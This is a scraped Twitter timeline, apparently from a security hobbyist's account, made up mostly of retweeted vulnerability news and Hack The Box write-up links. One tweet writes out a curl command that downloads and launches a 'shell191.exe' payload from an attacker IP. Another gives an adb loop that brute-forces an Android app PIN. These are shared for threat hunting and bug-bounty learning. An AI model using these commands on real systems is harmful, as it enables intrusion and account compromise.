Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @0xba3ba4
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @0xba3ba4
-
Prikvačeni tweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
0xba3ba4 proslijedio/la je Tweet
Cisco Discovery Protocol (CDP) enabled devices are vulnerable to Denial-of-Service (DoS) and Remote Code Execution (RCE)


CVE-2020-3110
CVE-2020-3111
CVE-2020-3118
CVE-2020-3119
CVE-2020-3120
Note: https://kb.cert.org/vuls/id/261385/
Hacking Video: https://www.youtube.com/watch?v=nYtDJlzU-ao&feature=youtu.be …pic.twitter.com/vxHxa6jlMH
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
A new security flaw (CVE-2020-6007) in Philips Smart Light Bulbs
could let remote attackers gain access to your entire WiFi network (over-the-air without cracking password) & launch further attacks against other devices connected to the same.
Details: https://thehackernews.com/2020/02/philips-smart-light-bulb-hacking.html …pic.twitter.com/dEQMookZNR
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
#TrickBot Uses a New Windows 10 UAC Bypass to Launch Quietly#malware http://bit.ly/3aU8FxD pic.twitter.com/yxuUxeBsml
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
#MetasploitCTF play starts Jan. 30 at noon EST (U.S. time). Find teammates in the#metasploit-ctf channel on Slack.https://blog.rapid7.com/2020/01/15/announcing-the-2020-metasploit-community-ctf/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
Yet Another Sudo
#Vulnerability! When 'pwfeedback' is enabled, a new Sudo bug could let low privileged#Linux &#macOS users (or malicious programs) execute arbitrary commands with 'root' privileges. Details for CVE-2019-18634 ➤ https://thehackernews.com/2020/02/sudo-linux-vulnerability.html …#infosec#cybersecuritypic.twitter.com/GWLgCegcCR
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
Here's my write-up for the retired
#RE from HTB. Created by@0xdf_. Dropping web shells from EvilWinRar, yo!https://hackso.me/re-htb-walkthrough/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
Another box solved the unintended way: RE. Once I had RCE after dropping an aspx webshell with the Winrar CVE, I used the UsoSvc service to gain SYSTEM and impersonated the Coby user to decrypt the root flag. Great box by
@0xdf_. https://snowscan.io/htb-writeup-re/#HackTheBoxHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
RE just retired from
@hackthebox_eu. As the creator of the box, I tried to bring phishing/macro obfuscation concepts to the initial access. The intended privescs were the WinRar ACE file exploit, and XXE in Ghidra. I'll show two unintended privescs too.https://0xdf.gitlab.io/2020/02/01/htb-re.html …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Public Methodologies for Identifying Cobalt Strike Team Servers.
#APT#C2#OSINThttps://www.recordedfuture.com/cobalt-strike-servers/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
A machine a day keeps the doctor away
Fatty will go live Feb 1 2020 at 19:00:00 UTC. RE will be retired! You still have time to hack your way in at http://hackthebox.eu/#join
#HackTheBox#NewRelease#ThinkOutsideTheBoxpic.twitter.com/OaqkRE5Siv
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
Tracking
#aggah, after Roma225 and the RG Campaign...Our last analysis on this Threat Actor drops Lokibot
UAC Bypass: CMSTP
https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/ …
@securityaffairs@malwrhunterteam@zlab_team@yoroisecurity@VK_Intel@PaloAltoNtwks@JAMESWT_MHTHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
If there is no rate limit on PIN functionality of Android APK ,but the app is protected by every mechanism, then try to brute Force using adb . for i in {0000..9999}; do adb shell input text
$i ; done#BugBounty#BugBountyTip#bugbounties#bugbountytips #600$Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
#Curl.exe is the new#rundll32.exe -#LOLbin Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 … https://youtu.be/f2xpCl2Y7t8#blueteam#redteam#dfir#ThreatHuntingPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
NEW: We examined in detail how 10 popular smartphone apps secretly share extensive personal information with at least 135 companies, systematically breaking EU data protection law. This must end. Two massive reports + legal complaints against 6 companies: https://www.forbrukerradet.no/side/new-study-the-advertising-industry-is-systematically-breaking-the-law/ …pic.twitter.com/TrSAsSoC2p
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
GDA is a Dalvik bytecode decompiler written entirely in c++: https://github.com/charles2gan/GDA-android-reversing-Tool/wiki …
#android#security#reversing#decompiler#cpp#bytecodeHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
The 28th HTB box I solve in preparation for the OSCP. Initial Foothold - FTP anon login + cleartext creds Privilege Escalation - RCE vuln associated with H2 database version that was being run with root privilegeshttps://medium.com/@ranakhalil101/hack-the-box-hawk-writeup-w-o-metasploit-da80d51defcd?source=friends_link&sk=ce7d99ab247b8aa135f44712d9b0bc00 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
#HackTheBox AI video is now online. A really cool "out of band" style of an SQL Injection using "Speech To Text". So you need to Verbally Speak out the injection. Once on the box do a pretty cool privesc via Java Debugging.https://www.youtube.com/watch?v=7n7YRntu3bc …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
AI from
@hackthebox_eu got retired so here's a writeup from me for it#hacking#pentesting#hackthebox#ctf#writeup#infosechttps://medium.com/@hussaini.faisal/hackthebox-writeup-ai-26f30fc90d93 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
One more writeup for AI from
@hackthebox_eu is up: https://snowscan.io/htb-writeup-ai/ That SQL injection using text-to-speech gave me a hard time.Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
0xba3ba4 proslijedio/la je Tweet
AI from
@hackthebox_eu just retired. SQLi through a speech recognition application and code execution as root through a jdwp internal service. Here's my write-up: https://0xrick.github.io/hack-the-box/ai/ …pic.twitter.com/4K2A09JHIr
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.